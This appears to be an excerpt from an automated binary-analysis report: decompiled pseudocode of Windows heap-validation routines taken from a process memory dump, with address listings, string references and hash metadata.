                                                                                                                          										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                                          										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                                          										__eflags =  *_t415;
                                                                                                                          									}
                                                                                                                          									_t415 = _t415 + _v28;
                                                                                                                          									__eflags = _t415;
                                                                                                                          									goto L86;
                                                                                                                          								}
                                                                                                                          								_t245 =  *(_t415 + 0x1c);
                                                                                                                          								if(_t245 == 0) {
                                                                                                                          									_t395 =  *_t415 & 0x0000ffff;
                                                                                                                          									_v6 = _t395 >> 8;
                                                                                                                          									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                                                                                          									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                                                                          										__eflags =  *(_t414 + 0x4c);
                                                                                                                          										if( *(_t414 + 0x4c) != 0) {
                                                                                                                          											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                                                                                          											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                                          											__eflags =  *_t415;
                                                                                                                          										}
                                                                                                                          										goto L107;
                                                                                                                          									}
                                                                                                                          									_t249 =  *[fs:0x30];
                                                                                                                          									__eflags =  *(_t249 + 0xc);
                                                                                                                          									if( *(_t249 + 0xc) == 0) {
                                                                                                                          										_push("HEAP: ");
                                                                                                                          										E009CB150();
                                                                                                                          									} else {
                                                                                                                          										E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          									}
                                                                                                                          									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                                                                                          									_push(_t415);
                                                                                                                          									_push("Heap block at %p is not last block in segment (%p)\n");
                                                                                                                          									L95:
                                                                                                                          									E009CB150();
                                                                                                                          									goto L117;
                                                                                                                          								}
                                                                                                                          								_v12 = _v12 + 1;
                                                                                                                          								_v16 = _v16 + (_t245 >> 0xc);
                                                                                                                          								if( *(_t414 + 0x4c) != 0) {
                                                                                                                          									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                                          									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                                          								}
                                                                                                                          								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                                                                                          								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                                                                          									L82:
                                                                                                                          									_v8 = _v8 & 0x00000000;
                                                                                                                          									goto L86;
                                                                                                                          								} else {
                                                                                                                          									if( *(_t414 + 0x4c) != 0) {
                                                                                                                          										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                                                                                          										 *_t415 = _t397;
                                                                                                                          										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                                                                                          										_t442 = _t397 >> 0x18 - _t367;
                                                                                                                          										if(_t397 >> 0x18 != _t367) {
                                                                                                                          											_push(_t367);
                                                                                                                          											E00A7FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                                                                                          										_t259 =  *[fs:0x30];
                                                                                                                          										__eflags =  *(_t259 + 0xc);
                                                                                                                          										if( *(_t259 + 0xc) == 0) {
                                                                                                                          											_push("HEAP: ");
                                                                                                                          											E009CB150();
                                                                                                                          										} else {
                                                                                                                          											E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          										}
                                                                                                                          										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                                                                                          										_push(_t415);
                                                                                                                          										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                                                                                          										goto L95;
                                                                                                                          									} else {
                                                                                                                          										if( *(_t414 + 0x4c) != 0) {
                                                                                                                          											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                                                                          											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                                          										}
                                                                                                                          										goto L82;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t281 = _v28 + 0xfffffff0;
                                                                                                                          						_v24 = _t281;
                                                                                                                          						__eflags = _t390 & 0x00000002;
                                                                                                                          						if((_t390 & 0x00000002) != 0) {
                                                                                                                          							__eflags = _t281 - 4;
                                                                                                                          							if(_t281 > 4) {
                                                                                                                          								_t281 = _t281 - 4;
                                                                                                                          								__eflags = _t281;
                                                                                                                          								_v24 = _t281;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						__eflags = _t390 & 0x00000008;
                                                                                                                          						if((_t390 & 0x00000008) == 0) {
                                                                                                                          							_t102 = _t415 + 0x10; // -8
                                                                                                                          							_t283 = E00A1D540(_t102, _t281, 0xfeeefeee);
                                                                                                                          							_v20 = _t283;
                                                                                                                          							__eflags = _t283 - _v24;
                                                                                                                          							if(_t283 != _v24) {
                                                                                                                          								_t284 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t284 + 0xc);
                                                                                                                          								if( *(_t284 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_t288 = _v20 + 8 + _t415;
                                                                                                                          								__eflags = _t288;
                                                                                                                          								_push(_t288);
                                                                                                                          								_push(_t415);
                                                                                                                          								_push("Free Heap block %p modified at %p after it was freed\n");
                                                                                                                          								goto L95;
                                                                                                                          							}
                                                                                                                          							goto L66;
                                                                                                                          						} else {
                                                                                                                          							_t374 =  *(_t415 + 8);
                                                                                                                          							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                                                                                          							_v24 = _t374;
                                                                                                                          							_v28 = _t400;
                                                                                                                          							_t294 =  *(_t374 + 4);
                                                                                                                          							__eflags =  *_t400 - _t294;
                                                                                                                          							if( *_t400 != _t294) {
                                                                                                                          								L64:
                                                                                                                          								_push(_t374);
                                                                                                                          								_push( *_t400);
                                                                                                                          								_t101 = _t415 + 8; // -16
                                                                                                                          								E00A8A80D(_t414, 0xd, _t101, _t294);
                                                                                                                          								goto L86;
                                                                                                                          							}
                                                                                                                          							_t56 = _t415 + 8; // -16
                                                                                                                          							__eflags =  *_t400 - _t56;
                                                                                                                          							_t374 = _v24;
                                                                                                                          							if( *_t400 != _t56) {
                                                                                                                          								goto L64;
                                                                                                                          							}
                                                                                                                          							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                                                                                          							_t402 =  *(_t414 + 0xb4);
                                                                                                                          							__eflags = _t402;
                                                                                                                          							if(_t402 == 0) {
                                                                                                                          								L35:
                                                                                                                          								_t298 = _v28;
                                                                                                                          								 *_t298 = _t374;
                                                                                                                          								 *(_t374 + 4) = _t298;
                                                                                                                          								__eflags =  *(_t415 + 2) & 0x00000008;
                                                                                                                          								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                                                                                          									L39:
                                                                                                                          									_t377 =  *_t415 & 0x0000ffff;
                                                                                                                          									_t299 = _t414 + 0xc0;
                                                                                                                          									_v28 =  *_t415 & 0x0000ffff;
                                                                                                                          									 *(_t415 + 2) = 0;
                                                                                                                          									 *((char*)(_t415 + 7)) = 0;
                                                                                                                          									__eflags =  *(_t414 + 0xb4);
                                                                                                                          									if( *(_t414 + 0xb4) == 0) {
                                                                                                                          										_t378 =  *_t299;
                                                                                                                          									} else {
                                                                                                                          										_t378 = E009EE12C(_t414, _t377);
                                                                                                                          										_t299 = _t414 + 0xc0;
                                                                                                                          									}
                                                                                                                          									__eflags = _t299 - _t378;
                                                                                                                          									if(_t299 == _t378) {
                                                                                                                          										L51:
                                                                                                                          										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                                                                                          										__eflags =  *_t300 - _t378;
                                                                                                                          										if( *_t300 != _t378) {
                                                                                                                          											_push(_t378);
                                                                                                                          											_push( *_t300);
                                                                                                                          											__eflags = 0;
                                                                                                                          											E00A8A80D(0, 0xd, _t378, 0);
                                                                                                                          										} else {
                                                                                                                          											_t87 = _t415 + 8; // -16
                                                                                                                          											_t406 = _t87;
                                                                                                                          											 *_t406 = _t378;
                                                                                                                          											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                                                                                          											 *_t300 = _t406;
                                                                                                                          											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                                                                                          										}
                                                                                                                          										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                                                                                          										_t405 =  *(_t414 + 0xb4);
                                                                                                                          										__eflags = _t405;
                                                                                                                          										if(_t405 == 0) {
                                                                                                                          											L61:
                                                                                                                          											__eflags =  *(_t414 + 0x4c);
                                                                                                                          											if(__eflags != 0) {
                                                                                                                          												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                                                                          												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                                          											}
                                                                                                                          											goto L86;
                                                                                                                          										} else {
                                                                                                                          											_t380 =  *_t415 & 0x0000ffff;
                                                                                                                          											while(1) {
                                                                                                                          												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                                                                                          												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												_t307 =  *_t405;
                                                                                                                          												__eflags = _t307;
                                                                                                                          												if(_t307 == 0) {
                                                                                                                          													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                                                                                          													L60:
                                                                                                                          													_t94 = _t415 + 8; // -16
                                                                                                                          													E009EE4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                                                                                          													goto L61;
                                                                                                                          												}
                                                                                                                          												_t405 = _t307;
                                                                                                                          											}
                                                                                                                          											_t309 = _t380;
                                                                                                                          											goto L60;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t407 =  *(_t414 + 0x4c);
                                                                                                                          										while(1) {
                                                                                                                          											__eflags = _t407;
                                                                                                                          											if(_t407 == 0) {
                                                                                                                          												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                                                                                          											} else {
                                                                                                                          												_t315 =  *(_t378 - 8);
                                                                                                                          												_t407 =  *(_t414 + 0x4c);
                                                                                                                          												__eflags = _t315 & _t407;
                                                                                                                          												if((_t315 & _t407) != 0) {
                                                                                                                          													_t315 = _t315 ^  *(_t414 + 0x50);
                                                                                                                          													__eflags = _t315;
                                                                                                                          												}
                                                                                                                          												_t312 = _t315 & 0x0000ffff;
                                                                                                                          											}
                                                                                                                          											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                                                                                          											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                                                                                          												goto L51;
                                                                                                                          											}
                                                                                                                          											_t378 =  *_t378;
                                                                                                                          											__eflags = _t414 + 0xc0 - _t378;
                                                                                                                          											if(_t414 + 0xc0 != _t378) {
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          											goto L51;
                                                                                                                          										}
                                                                                                                          										goto L51;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t317 = E009EA229(_t414, _t415);
                                                                                                                          								__eflags = _t317;
                                                                                                                          								if(_t317 != 0) {
                                                                                                                          									goto L39;
                                                                                                                          								}
                                                                                                                          								E009EA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                                                                                          								goto L86;
                                                                                                                          							}
                                                                                                                          							_t385 =  *_t415 & 0x0000ffff;
                                                                                                                          							while(1) {
                                                                                                                          								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                                                                                          								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t320 =  *_t402;
                                                                                                                          								__eflags = _t320;
                                                                                                                          								if(_t320 == 0) {
                                                                                                                          									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                                                                                          									L34:
                                                                                                                          									_t63 = _t415 + 8; // -16
                                                                                                                          									E009EBC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                                                                                          									_t374 = _v24;
                                                                                                                          									goto L35;
                                                                                                                          								}
                                                                                                                          								_t402 = _t320;
                                                                                                                          							}
                                                                                                                          							_t322 = _t385;
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_a20 == 0) {
                                                                                                                          						L18:
                                                                                                                          						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                                                                                          							goto L67;
                                                                                                                          						}
                                                                                                                          						if(E00A723E3(_t414, _t415) == 0) {
                                                                                                                          							goto L117;
                                                                                                                          						}
                                                                                                                          						goto L67;
                                                                                                                          					} else {
                                                                                                                          						if((_t390 & 0x00000002) == 0) {
                                                                                                                          							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                                                                                          						} else {
                                                                                                                          							_t328 = E009C1F5B(_t415);
                                                                                                                          							_t342 = _v20;
                                                                                                                          							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                                                                                          						}
                                                                                                                          						_t429 = _t326;
                                                                                                                          						if(_t429 == 0) {
                                                                                                                          							goto L18;
                                                                                                                          						}
                                                                                                                          						if(_t429 >= 0) {
                                                                                                                          							__eflags = _t326 & 0x00000800;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								goto L18;
                                                                                                                          							}
                                                                                                                          							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                                                                                          							if(__eflags >= 0) {
                                                                                                                          								goto L18;
                                                                                                                          							}
                                                                                                                          							_t412 = _a20;
                                                                                                                          							_t327 = _t326 & 0x0000ffff;
                                                                                                                          							L17:
                                                                                                                          							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                                                                                          							goto L18;
                                                                                                                          						}
                                                                                                                          						_t327 = _t326 & 0x00007fff;
                                                                                                                          						if(_t327 >= 0x81) {
                                                                                                                          							goto L18;
                                                                                                                          						}
                                                                                                                          						_t412 = _a24;
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          					L86:
                                                                                                                          				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                                                                                          				_t189 = _v12;
                                                                                                                          				goto L88;
                                                                                                                          			}



































































                                                                                                                          0x00a84f80
                                                                                                                          0x00a84f81
                                                                                                                          0x00000000
                                                                                                                          0x00a84e74
                                                                                                                          0x00a84e78
                                                                                                                          0x00a84e82
                                                                                                                          0x00a84e88
                                                                                                                          0x00a84e88
                                                                                                                          0x00000000
                                                                                                                          0x00a84e78
                                                                                                                          0x00a84e6e
                                                                                                                          0x00a84e38
                                                                                                                          0x00a84df3
                                                                                                                          0x00a84bfe
                                                                                                                          0x00a84c01
                                                                                                                          0x00a84c04
                                                                                                                          0x00a84c07
                                                                                                                          0x00a84c09
                                                                                                                          0x00a84c0c
                                                                                                                          0x00a84c0e
                                                                                                                          0x00a84c0e
                                                                                                                          0x00a84c11
                                                                                                                          0x00a84c11
                                                                                                                          0x00a84c0c
                                                                                                                          0x00a84c14
                                                                                                                          0x00a84c17
                                                                                                                          0x00a84dae
                                                                                                                          0x00a84db2
                                                                                                                          0x00a84db7
                                                                                                                          0x00a84dba
                                                                                                                          0x00a84dbd
                                                                                                                          0x00a84ef1
                                                                                                                          0x00a84ef7
                                                                                                                          0x00a84efb
                                                                                                                          0x00a84f1a
                                                                                                                          0x00a84f1f
                                                                                                                          0x00a84efd
                                                                                                                          0x00a84f12
                                                                                                                          0x00a84f17
                                                                                                                          0x00a84f2b
                                                                                                                          0x00a84f2b
                                                                                                                          0x00a84f2d
                                                                                                                          0x00a84f2e
                                                                                                                          0x00a84f2f
                                                                                                                          0x00000000
                                                                                                                          0x00a84f2f
                                                                                                                          0x00000000
                                                                                                                          0x00a84c1d
                                                                                                                          0x00a84c1d
                                                                                                                          0x00a84c20
                                                                                                                          0x00a84c23
                                                                                                                          0x00a84c26
                                                                                                                          0x00a84c29
                                                                                                                          0x00a84c2c
                                                                                                                          0x00a84c2e
                                                                                                                          0x00a84d91
                                                                                                                          0x00a84d91
                                                                                                                          0x00a84d92
                                                                                                                          0x00a84d97
                                                                                                                          0x00a84d9e
                                                                                                                          0x00000000
                                                                                                                          0x00a84d9e
                                                                                                                          0x00a84c34
                                                                                                                          0x00a84c37
                                                                                                                          0x00a84c39
                                                                                                                          0x00a84c3c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84c45
                                                                                                                          0x00a84c48
                                                                                                                          0x00a84c4e
                                                                                                                          0x00a84c50
                                                                                                                          0x00a84c78
                                                                                                                          0x00a84c78
                                                                                                                          0x00a84c7b
                                                                                                                          0x00a84c7d
                                                                                                                          0x00a84c80
                                                                                                                          0x00a84c84
                                                                                                                          0x00a84cad
                                                                                                                          0x00a84cad
                                                                                                                          0x00a84cb0
                                                                                                                          0x00a84cb8
                                                                                                                          0x00a84cbb
                                                                                                                          0x00a84cbe
                                                                                                                          0x00a84cc1
                                                                                                                          0x00a84cc7
                                                                                                                          0x00a84cdc
                                                                                                                          0x00a84cc9
                                                                                                                          0x00a84cd2
                                                                                                                          0x00a84cd4
                                                                                                                          0x00a84cd4
                                                                                                                          0x00a84cde
                                                                                                                          0x00a84ce0
                                                                                                                          0x00a84d13
                                                                                                                          0x00a84d13
                                                                                                                          0x00a84d16
                                                                                                                          0x00a84d18
                                                                                                                          0x00a84d29
                                                                                                                          0x00a84d2a
                                                                                                                          0x00a84d2c
                                                                                                                          0x00a84d34
                                                                                                                          0x00a84d1a
                                                                                                                          0x00a84d1a
                                                                                                                          0x00a84d1a
                                                                                                                          0x00a84d1d
                                                                                                                          0x00a84d1f
                                                                                                                          0x00a84d22
                                                                                                                          0x00a84d24
                                                                                                                          0x00a84d24
                                                                                                                          0x00a84d3c
                                                                                                                          0x00a84d3f
                                                                                                                          0x00a84d45
                                                                                                                          0x00a84d47
                                                                                                                          0x00a84d6c
                                                                                                                          0x00a84d6c
                                                                                                                          0x00a84d70
                                                                                                                          0x00a84d7e
                                                                                                                          0x00a84d84
                                                                                                                          0x00a84d84
                                                                                                                          0x00000000
                                                                                                                          0x00a84d49
                                                                                                                          0x00a84d49
                                                                                                                          0x00a84d56
                                                                                                                          0x00a84d56
                                                                                                                          0x00a84d59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84d4e
                                                                                                                          0x00a84d50
                                                                                                                          0x00a84d52
                                                                                                                          0x00a84d8e
                                                                                                                          0x00a84d5d
                                                                                                                          0x00a84d5f
                                                                                                                          0x00a84d67
                                                                                                                          0x00000000
                                                                                                                          0x00a84d67
                                                                                                                          0x00a84d54
                                                                                                                          0x00a84d54
                                                                                                                          0x00a84d5b
                                                                                                                          0x00000000
                                                                                                                          0x00a84d5b
                                                                                                                          0x00a84ce2
                                                                                                                          0x00a84ce2
                                                                                                                          0x00a84ce5
                                                                                                                          0x00a84ce5
                                                                                                                          0x00a84ce7
                                                                                                                          0x00a84cfb
                                                                                                                          0x00a84ce9
                                                                                                                          0x00a84ce9
                                                                                                                          0x00a84cec
                                                                                                                          0x00a84cef
                                                                                                                          0x00a84cf1
                                                                                                                          0x00a84cf3
                                                                                                                          0x00a84cf3
                                                                                                                          0x00a84cf3
                                                                                                                          0x00a84cf6
                                                                                                                          0x00a84cf6
                                                                                                                          0x00a84d02
                                                                                                                          0x00a84d05
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84d07
                                                                                                                          0x00a84d0f
                                                                                                                          0x00a84d11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84d11
                                                                                                                          0x00000000
                                                                                                                          0x00a84ce5
                                                                                                                          0x00a84ce0
                                                                                                                          0x00a84c8a
                                                                                                                          0x00a84c8f
                                                                                                                          0x00a84c91
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84c9d
                                                                                                                          0x00000000
                                                                                                                          0x00a84c9d
                                                                                                                          0x00a84c52
                                                                                                                          0x00a84c5f
                                                                                                                          0x00a84c5f
                                                                                                                          0x00a84c62
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84c57
                                                                                                                          0x00a84c59
                                                                                                                          0x00a84c5b
                                                                                                                          0x00a84caa
                                                                                                                          0x00a84c66
                                                                                                                          0x00a84c68
                                                                                                                          0x00a84c70
                                                                                                                          0x00a84c75
                                                                                                                          0x00000000
                                                                                                                          0x00a84c75
                                                                                                                          0x00a84c5d
                                                                                                                          0x00a84c5d
                                                                                                                          0x00a84c64
                                                                                                                          0x00000000
                                                                                                                          0x00a84c64
                                                                                                                          0x00a84c17
                                                                                                                          0x00a84b75
                                                                                                                          0x00a84bc4
                                                                                                                          0x00a84bc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84bd9
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                          • API String ID: 0-3591852110
                                                                                                                          • Opcode ID: 3fdfaf0f1fded053b5903b64506a2fd7b3da44c50e78ea4297f157258095f68b
                                                                                                                          • Instruction ID: c789f932e3e35a37e24ec3e327034acdd6b3eda6a91b5245b94b96b295117271
                                                                                                                          • Opcode Fuzzy Hash: 3fdfaf0f1fded053b5903b64506a2fd7b3da44c50e78ea4297f157258095f68b
                                                                                                                          • Instruction Fuzzy Hash: 5512DC706046429FDB25EF28C495BBABBF5FF48714F18845DE8868B682D734EC80CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 56%
                                                                                                                          			E00A84496(signed int* __ecx, void* __edx) {
                                                                                                                          				signed int _v5;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed char _v24;
                                                                                                                          				signed int* _v28;
                                                                                                                          				char _v32;
                                                                                                                          				signed int* _v36;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				void* _t150;
                                                                                                                          				intOrPtr _t151;
                                                                                                                          				signed char _t156;
                                                                                                                          				intOrPtr _t157;
                                                                                                                          				unsigned int _t169;
                                                                                                                          				intOrPtr _t170;
                                                                                                                          				signed int* _t183;
                                                                                                                          				signed char _t184;
                                                                                                                          				intOrPtr _t191;
                                                                                                                          				signed int _t201;
                                                                                                                          				intOrPtr _t203;
                                                                                                                          				intOrPtr _t212;
                                                                                                                          				intOrPtr _t220;
                                                                                                                          				signed int _t230;
                                                                                                                          				signed int _t241;
                                                                                                                          				signed int _t244;
                                                                                                                          				void* _t259;
                                                                                                                          				signed int _t260;
                                                                                                                          				signed int* _t261;
                                                                                                                          				intOrPtr* _t262;
                                                                                                                          				signed int _t263;
                                                                                                                          				signed int* _t264;
                                                                                                                          				signed int _t267;
                                                                                                                          				signed int* _t268;
                                                                                                                          				void* _t270;
                                                                                                                          				void* _t281;
                                                                                                                          				signed short _t285;
                                                                                                                          				signed short _t289;
                                                                                                                          				signed int _t291;
                                                                                                                          				signed int _t298;
                                                                                                                          				signed char _t303;
                                                                                                                          				signed char _t308;
                                                                                                                          				signed int _t314;
                                                                                                                          				intOrPtr _t317;
                                                                                                                          				unsigned int _t319;
                                                                                                                          				signed int* _t325;
                                                                                                                          				signed int _t326;
                                                                                                                          				signed int _t327;
                                                                                                                          				intOrPtr _t328;
                                                                                                                          				signed int _t329;
                                                                                                                          				signed int _t330;
                                                                                                                          				signed int* _t331;
                                                                                                                          				signed int _t332;
                                                                                                                          				signed int _t350;
                                                                                                                          
                                                                                                                          				_t259 = __edx;
                                                                                                                          				_t331 = __ecx;
                                                                                                                          				_v28 = __ecx;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t150 = E00A849A4(__ecx);
                                                                                                                          				_t267 = 1;
                                                                                                                          				if(_t150 == 0) {
                                                                                                                          					L61:
                                                                                                                          					_t151 =  *[fs:0x30];
                                                                                                                          					__eflags =  *((char*)(_t151 + 2));
                                                                                                                          					if( *((char*)(_t151 + 2)) != 0) {
                                                                                                                          						 *0xab6378 = _t267;
                                                                                                                          						asm("int3");
                                                                                                                          						 *0xab6378 = 0;
                                                                                                                          					}
                                                                                                                          					__eflags = _v12;
                                                                                                                          					if(_v12 != 0) {
                                                                                                                          						_t105 =  &_v16;
                                                                                                                          						 *_t105 = _v16 & 0x00000000;
                                                                                                                          						__eflags =  *_t105;
                                                                                                                          						E009F174B( &_v12,  &_v16, 0x8000);
                                                                                                                          					}
                                                                                                                          					L65:
                                                                                                                          					__eflags = 0;
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                                                                                          					_t268 =  &(_t331[0x30]);
                                                                                                                          					_v32 = 0;
                                                                                                                          					_t260 =  *_t268;
                                                                                                                          					_t308 = 0;
                                                                                                                          					_v24 = 0;
                                                                                                                          					while(_t268 != _t260) {
                                                                                                                          						_t260 =  *_t260;
                                                                                                                          						_v16 =  *_t325 & 0x0000ffff;
                                                                                                                          						_t156 = _t325[0];
                                                                                                                          						_v28 = _t325;
                                                                                                                          						_v5 = _t156;
                                                                                                                          						__eflags = _t156 & 0x00000001;
                                                                                                                          						if((_t156 & 0x00000001) != 0) {
                                                                                                                          							_t157 =  *[fs:0x30];
                                                                                                                          							__eflags =  *(_t157 + 0xc);
                                                                                                                          							if( *(_t157 + 0xc) == 0) {
                                                                                                                          								_push("HEAP: ");
                                                                                                                          								E009CB150();
                                                                                                                          							} else {
                                                                                                                          								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          							}
                                                                                                                          							_push(_t325);
                                                                                                                          							E009CB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                                                                                          							L32:
                                                                                                                          							_t270 = 0;
                                                                                                                          							__eflags = _t331[0x13];
                                                                                                                          							if(_t331[0x13] != 0) {
                                                                                                                          								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                                                                                          								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                                                                          							}
                                                                                                                          							L60:
                                                                                                                          							_t267 = _t270 + 1;
                                                                                                                          							__eflags = _t267;
                                                                                                                          							goto L61;
                                                                                                                          						}
                                                                                                                          						_t169 =  *_t325 & 0x0000ffff;
                                                                                                                          						__eflags = _t169 - _t308;
                                                                                                                          						if(_t169 < _t308) {
                                                                                                                          							_t170 =  *[fs:0x30];
                                                                                                                          							__eflags =  *(_t170 + 0xc);
                                                                                                                          							if( *(_t170 + 0xc) == 0) {
                                                                                                                          								_push("HEAP: ");
                                                                                                                          								E009CB150();
                                                                                                                          							} else {
                                                                                                                          								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          							}
                                                                                                                          							E009CB150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                                                                                          							goto L32;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t331[0x13];
                                                                                                                          							_t308 = _t169;
                                                                                                                          							_v24 = _t308;
                                                                                                                          							if(_t331[0x13] != 0) {
                                                                                                                          								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                                                                                          								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                                                                          								__eflags =  *_t325;
                                                                                                                          							}
                                                                                                                          							_t26 =  &_v32;
                                                                                                                          							 *_t26 = _v32 + 1;
                                                                                                                          							__eflags =  *_t26;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                                                                                          					if( *0xab6350 != 0 && _t331[0x2f] != 0) {
                                                                                                                          						_push(4);
                                                                                                                          						_push(0x1000);
                                                                                                                          						_push( &_v16);
                                                                                                                          						_push(0);
                                                                                                                          						_push( &_v12);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						if(E00A09660() >= 0) {
                                                                                                                          							_v20 = _v12 + 0x204;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t183 =  &(_t331[0x27]);
                                                                                                                          					_t281 = 0x81;
                                                                                                                          					_t326 =  *_t183;
                                                                                                                          					if(_t183 == _t326) {
                                                                                                                          						L49:
                                                                                                                          						_t261 =  &(_t331[0x29]);
                                                                                                                          						_t184 = 0;
                                                                                                                          						_t327 =  *_t261;
